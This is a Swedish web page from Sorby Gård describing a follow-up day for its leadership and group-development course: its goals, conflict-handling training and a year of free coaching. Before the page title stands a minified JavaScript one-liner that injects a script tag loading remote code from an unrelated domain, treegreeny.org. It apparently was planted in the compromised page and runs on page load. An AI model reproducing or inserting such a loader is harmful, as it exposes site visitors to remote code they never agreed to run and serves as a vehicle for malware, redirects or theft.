;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Uppföljningsdag | Sorby Gård

Uppföljningsdag

Många kursdeltagare och kunder har genom åren önskat någon form av fortsättning/ uppföljning av kursen Ledarskap & Grupputveckling. Vi har genomfört en uppföljning under ett dygn med deltagare från en tidigare “grundkurs”, som blev mycket lyckad och uppskattad.

Vi lägger därför till en utbildningsdag/uppföljningsdygn på internat, ca 3 månader efter ”Grundkursens” fem dagar.

Syftet med uppföljningen är:

• Återkoppling till “Grundkursen” Ledarskap & Grupputveckling.

• Reflektion utifrån de övningar / kunskaper / verktyg som den veckan innebar.

• Fördjupad självkännedom utifrån IDI-beteendestil – “Core Quality”.

• Konflikthantering / svåra samtal, praktiska verktyg och samtalsträning.

Vi erbjuder även en kostnadsfri ”coaching”, kring ledarskap mm under ett år efter det att uppföljningsdagen genomförts.

Vi tror att denna förändring kommer att bidra till stärkta kunskaper och fördjupade insikter hos våra kursdeltagare.